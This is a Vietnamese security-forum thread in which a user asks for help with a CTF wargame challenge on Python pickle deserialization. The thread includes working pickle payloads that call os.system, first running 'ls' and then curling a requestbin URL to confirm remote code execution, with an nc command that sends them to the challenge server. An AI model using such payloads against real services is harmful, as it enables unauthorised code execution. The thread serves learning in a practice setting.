Cho cháu hỏi bài Misc06 trong Play ! 2

learn2hack

Member
11/05/2018
2
17 bài viết
Cho cháu hỏi bài Misc06 trong Play ! 2
Cho cháu hỏi bài Misc06 trong Play ! 2
theo Mô tả và Gợi ý
Pickle

OMG! Pickle again

nc 103.237.98.28 7475
là dạng bài Deserialization Pickle,

cháu viết exploit sau
#!/usr/bin/env python

import pickle
import os

class Exploit(object):
def __reduce__(self):
return (os.system, ('ls',))
#note = Note("name", "date", "content")
with open("save.pickle", 'wb') as f:
pickle.dump(Exploit(), f, protocol=0)


gửi exploit bởi lệnh:
cat save.pickle | nc 103.237.98.28 7475
nhận được respone "Ahihihi?" từ server

Cháu không hiểu ý đồ tác giả bài này là thế nào ạ?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Chào bạn, bạn mình đã báo Mod phụ trách Wargame để phản hồi bạn nhé.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bài này server không phản hồi, Nên bạn thử sử dụng kỹ thuật dùng lệnh curl lên host free để xem mình có thể thực hiện được câu lệnh hay chưa
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bài này server không phản hồi, Nên bạn thử sử dụng kỹ thuật dùng lệnh curl lên host free để xem mình có thể thực hiện được câu lệnh hay chưa
Cháu sửa lại payload
import cPickle
import os

cmd = "curl http://requestbin.fullcontact.com/5a23as26"

class ex(object):
def __reduce__(self):
return (os.system,(cmd,))

print cPickle.dumps(ex())


gửi tới server nhưng không thấy phản hồi trên requestbin

Vẫn chưa được, chú xem payload trên sao không chạy ạ?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Cháu sửa lại payload
import cPickle
import os

cmd = "curl http://requestbin.fullcontact.com/5a23as26"

class ex(object):
def __reduce__(self):
return (os.system,(cmd,))

print cPickle.dumps(ex())


gửi tới server nhưng không thấy phản hồi trên requestbin

Vẫn chưa được, chú xem payload trên sao không chạy ạ?
Mình chạy payload của bạn vẫn bình thường, bạn xem lại nhé
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên